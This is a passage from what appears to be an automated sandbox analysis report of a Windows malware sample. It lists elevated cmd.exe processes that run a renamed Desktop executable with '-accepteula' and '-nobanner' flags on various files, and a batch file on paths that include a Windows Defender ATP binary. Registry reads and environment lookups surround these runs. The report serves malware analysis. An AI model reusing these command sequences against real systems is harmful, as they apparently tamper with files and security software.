| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0xaec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #191: cmd.exe
51
0
| Information | Value |
|---|---|
| ID | #191 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "Workflow.Targets" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:14, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf8c |
| Parent PID | 0x10cc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9B0
0x
121C
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x1278, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #192: cmd.exe
51
0
| Information | Value |
|---|---|
| ID | #192 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "PhotoAcq.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:14, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf58 |
| Parent PID | 0x1124 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1358
0x
10F8
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 56, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x1390, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #193: cmd.exe
49
0
| Information | Value |
|---|---|
| ID | #193 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:14, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf30 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D0C
0x
FB4
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 |
Process #195: cmd.exe
49
0
| Information | Value |
|---|---|
| ID | #195 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:19, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11f8 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1158
0x
12F8
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 |
Process #197: cmd.exe
46
0
| Information | Value |
|---|---|
| ID | #197 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "does.exe" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:21, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1348 |
| Parent PID | 0xe60 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1380
0x
1248
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 96, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
